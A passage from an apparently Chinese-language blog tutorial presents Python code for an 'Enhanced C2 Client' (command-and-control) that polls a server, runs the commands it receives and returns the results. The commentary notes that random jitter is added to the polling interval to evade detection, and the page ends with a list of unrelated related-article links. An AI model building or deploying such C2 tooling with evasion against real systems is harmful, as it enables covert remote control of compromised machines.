seconds")time.sleep(sleep_time)except KeyboardInterrupt:logging.info("Polling stopped by user")except Exception as e:logging.error(f"Error in polling loop: {str(e)}", exc_info=True)
  • _get_local_ip:获取客户端本地 IP 地址(通过临时连接到公共服务器实现)
  • start_polling:启动轮询模式(核心功能之一):
    • 定期与服务器通信(默认间隔 60 秒)
    • 接收服务器下发的命令,执行后返回结果
    • 轮询间隔添加随机抖动(±20%),避免固定时间间隔被检测(提高隐蔽性)

5. 主函数 main

def main():"""主函数"""parser = argparse.ArgumentParser(description="Enhanced C2 Client")parser.add_argument("--config", help="Path to configuration file", default="client_config.json")parser.add_argument("--command", help="Send a single command to the server")parser.add_argument("--poll", action="store_true", help="Start polling the server continuously")args = parser.parse_args()# 加载配置config = C2ClientConfig()config.load_from_file(args.config)# 创建客户端实例client = EnhancedC2Client(config)# 执行操作if args.command:logging.info(f"Sending command: {args.command}")response = client.send_command(args.command)if response:logging.info(f"Server response: {json.dumps(response, indent=2)}")else:logging.error("No response from server")elif args.poll:client.start_polling()else:parser.print_help()
  • 处理命令行参数:支持指定配置文件、发送单条命令、启动轮询模式
  • 加载配置文件并创建客户端实例
  • 根据参数执行对应操作:发送单命令或启动轮询

服务端实操

客户端实操

以上代码能够基本构成简单的C2通道,在此代码的基础上,能够增加许多的功能,比如命令执行等。

http://www.dtcms.com/a/361764.html

相关文章:

  • GD32入门到实战24--RTC实时时钟
  • 恶意软件概念学习
  • 【游戏开发】Houdini相较于Blender在游戏开发上有什么优劣势?我该怎么选择开发工具?
  • 【Java】Redis(中间件)
  • 订单后台管理系统-day07菜品模块
  • 域名备案后不解析可以吗
  • 五、导入现有模型
  • Docker基本介绍
  • 面试记录8 Linux/c++中级开发工程师(智能座舱)
  • 六大关键步骤:用MES系统重构生产计划管理闭环
  • Linux开发必备:yum/vim/gcc/make全攻略
  • 如何使用 JMeter 进行接口测试。
  • Java 常见异常系列:NumberFormatException 数字格式异常
  • ROS1系列学习笔记之ROS的调用,示例为激光雷达N10P的运行(含常见问题与踩坑解答)
  • 数据结构:计数排序 (Counting Sort)
  • 逻辑门编程(一)——与或非门
  • 接口响应慢 问题排查指南
  • MongoDB 内存管理:WiredTiger 引擎原理与配置优化
  • GraalVM Native Image:让 Java 程序秒启动
  • 植物中lncRNA鉴定和注释流程,代码(包含Identified,Classification,WGCNA.....)
  • shell编程 函数、数组与正则表达式
  • 预处理——嵌入式学习笔记
  • day06——类型转换、赋值、深浅拷贝、可变和不可变类型
  • 009=基于YOLO12与PaddleOCR的车牌识别系统(Python+PySide6界面+训练代码)
  • C++运行时类型识别
  • k8s知识点汇总2
  • Java 加载自定义字体失败?从系统 fontconfig 到 Maven 损坏的全链路排查指南
  • 基于 C 语言的网络单词查询系统设计与实现(客户端 + 服务器端)
  • 适合工程软件使用的python画图插件对比
  • Maven - Nexus搭建maven私有仓库;上传jar包